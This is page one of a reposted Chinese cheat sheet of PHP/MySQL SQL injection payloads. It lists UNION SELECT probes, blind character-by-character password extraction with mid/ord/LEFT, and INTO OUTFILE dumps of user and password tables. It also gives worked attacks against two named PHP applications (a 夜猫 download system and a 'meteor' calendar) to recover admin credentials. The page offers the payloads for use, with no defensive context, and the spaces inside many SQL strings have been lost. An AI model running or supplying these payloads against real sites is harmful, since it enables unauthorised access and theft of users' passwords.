高级php注入方法集锦第1/2页
高级php注入方法集锦第1/2页
发布时间:2016-12-29 来源:查字典编辑
摘要:'%23'andpassWord='mypassid=-1unionselect1,1,1id=-1unionselectchar(97),...

'%23

'andpassWord='mypass

id=-1unionselect1,1,1

id=-1unionselectchar(97),char(97),char(97)

id=1unionselect1,1,1frommembers

id=1unionselect1,1,1fromadmin

id=1unionselect1,1,1fromuser

userid=1andpassword=mypass

userid=1andmid(password,3,1)=char(112)

userid=1andmid(password,4,1)=char(97)

andord(mid(password,3,1))>111(ord函数很好用,可以返回整形的)

'andLENGTH(password)='6(探测密码长度)

'andLEFT(password,1)='m

'andLEFT(password,2)='my

…………………………依次类推

'unionselect1,username,passwordfromuser/*

'unionselect1,username,passwordfromuser/*

='unionselect1,username,passwordfromuser/*(可以是1或者=后直接跟)

99999'unionselect1,username,passwordfromuser/*

'intooutfile'c:/file.txt(导出文件)

='or1=1intooutfile'c:/file.txt

1'unionselect1,username,passwordfromuserintooutfile'c:/user.txt

selectpasswordFROMadminswherelogin='John'INTODUMPFILE'/path/to/site/file.txt'

id='unionselect1,username,passwordfromuserintooutfile

id=-1unionselect1,database(),version()(灵活应用查询)

常用查询测试语句,

select*FROMtablewhere1=1

select*FROMtablewhere'uuu'='uuu'

select*FROMtablewhere1<>2

select*FROMtablewhere3>2

select*FROMtablewhere2<3

select*FROMtablewhere1

select*FROMtablewhere1+1

select*FROMtablewhere1--1

select*FROMtablewhereISNULL(NULL)

select*FROMtablewhereISNULL(COT(0))

select*FROMtablewhere1ISNOTNULL

select*FROMtablewhereNULLISNULL

select*FROMtablewhere2BETWEEN1AND3

select*FROMtablewhere'b'BETWEEN'a'AND'c'

select*FROMtablewhere2IN(0,1,2)

select*FROMtablewhereCASEWHEN1>0THEN1END

例如:夜猫下载系统1.0版本

id=1unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1

unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_user

unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1

id=10000unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1andgroupid=1

unionselect1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1(替换,寻找密码)

unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1andord(mid(password,1,1))=49(验证第一位密码)

unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1andord(mid(password,2,1))=50(第二位)

unionselect1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1fromymdown_userwhereid=1andord(mid(password,3,1))=51

…………………………………………………………

例如2:灰色轨迹变换id进行测试(meteor)

union%20(select%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20where%20eventid%20=%2013)%20order%20by%20eventdate

union%20(select%20allowsmilies,public,userid,'0000-0-0',pass(),version()%20FROM%20calendar_events%20where%20eventid%20=%2010)%20order%20by%20eventdate

当前1/2页12下一页阅读全文

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新php教程学习
热门php教程学习
编程开发子分类